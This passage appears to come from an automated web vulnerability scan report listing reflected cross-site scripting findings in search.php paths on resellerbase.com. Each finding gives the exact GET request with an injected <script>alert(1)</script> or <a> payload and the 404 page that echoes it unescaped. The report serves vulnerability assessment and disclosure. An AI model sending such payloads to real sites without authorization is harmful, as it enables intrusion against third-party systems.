Request

GET /detail/15/themes/kosmos/images/ratingd64f3<script>alert(1)</script>d9f01285b0d/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/images/ratingd64f3<script>alert(1)</script>d9f01285b0d/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1261. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload e2a16<script>alert(1)</script>66d0bcc8551 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos/images/rating/search.phpe2a16<script>alert(1)</script>66d0bcc8551?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/images/rating/search.phpe2a16<script>alert(1)</script>66d0bcc8551?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1262. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 53684<a>89e274aa0bf was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/15/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search53684<a>89e274aa0bf&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search53684<a>89e274aa0bf&opt=2 was not found on this server.</p>
...[SNIP]...

2.1263. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload ec613<a>d70e565ab6c was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/15/themes/kosmos/images/rating/search.php?keyword=search...ec613<a>d70e565ab6c&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/images/rating/search.php?keyword=search...ec613<a>d70e565ab6c&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1264. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9b6cf<script>alert(1)</script>450c667cdb0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&9b6cf<script>alert(1)</script>450c667cdb0=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&9b6cf<script>alert(1)</script>450c667cdb0=1 was not found on this server.</p>
...[SNIP]...

2.1265. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 4544d<a>38fecdc7a24 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/15/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=24544d<a>38fecdc7a24 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=24544d<a>38fecdc7a24 was not found on this server.</p>
...[SNIP]...

2.1266. http://www.resellerbase.com/detail/15/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 89d69<script>alert(1)</script>6988ceb4231 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail89d69<script>alert(1)</script>6988ceb4231/15/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail89d69<script>alert(1)</script>6988ceb4231/15/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1267. http://www.resellerbase.com/detail/15/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c1686<script>alert(1)</script>bfc2a2631b9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15c1686<script>alert(1)</script>bfc2a2631b9/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15c1686<script>alert(1)</script>bfc2a2631b9/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1268. http://www.resellerbase.com/detail/15/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a9b46<script>alert(1)</script>d2c167c5ec9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themesa9b46<script>alert(1)</script>d2c167c5ec9/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themesa9b46<script>alert(1)</script>d2c167c5ec9/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1269. http://www.resellerbase.com/detail/15/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4b457<script>alert(1)</script>4256142e8d5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos4b457<script>alert(1)</script>4256142e8d5/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos4b457<script>alert(1)</script>4256142e8d5/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1270. http://www.resellerbase.com/detail/15/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c8b44<script>alert(1)</script>17403eebb43 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos/imagesc8b44<script>alert(1)</script>17403eebb43/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/imagesc8b44<script>alert(1)</script>17403eebb43/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1271. http://www.resellerbase.com/detail/15/themes/kosmos/images/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 4c1e2<script>alert(1)</script>f4f77f848ac was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos/images/search.php4c1e2<script>alert(1)</script>f4f77f848ac?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/images/search.php4c1e2<script>alert(1)</script>f4f77f848ac?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1272. http://www.resellerbase.com/detail/15/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 729f1<a>a82e5ea8f05 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/15/themes/kosmos/images/search.php?keyword=search...&Submit3=Search729f1<a>a82e5ea8f05&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/images/search.php?keyword=search...&Submit3=Search729f1<a>a82e5ea8f05&opt=2 was not found on this server.</p>
...[SNIP]...

2.1273. http://www.resellerbase.com/detail/15/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 49501<a>a512c1b4bfa was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/15/themes/kosmos/images/search.php?keyword=search...49501<a>a512c1b4bfa&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/images/search.php?keyword=search...49501<a>a512c1b4bfa&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1274. http://www.resellerbase.com/detail/15/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c3bae<script>alert(1)</script>2dd96e7208f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&c3bae<script>alert(1)</script>2dd96e7208f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&c3bae<script>alert(1)</script>2dd96e7208f=1 was not found on this server.</p>
...[SNIP]...

2.1275. http://www.resellerbase.com/detail/15/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 1eb7b<a>6b9d4ebd7d5 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/15/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=21eb7b<a>6b9d4ebd7d5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=21eb7b<a>6b9d4ebd7d5 was not found on this server.</p>
...[SNIP]...

2.1276. http://www.resellerbase.com/detail/15/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d5778<script>alert(1)</script>e5142479c8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild5778<script>alert(1)</script>e5142479c8f/15/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild5778<script>alert(1)</script>e5142479c8f/15/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1277. http://www.resellerbase.com/detail/15/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e2520<script>alert(1)</script>e033b2f823d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15e2520<script>alert(1)</script>e033b2f823d/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

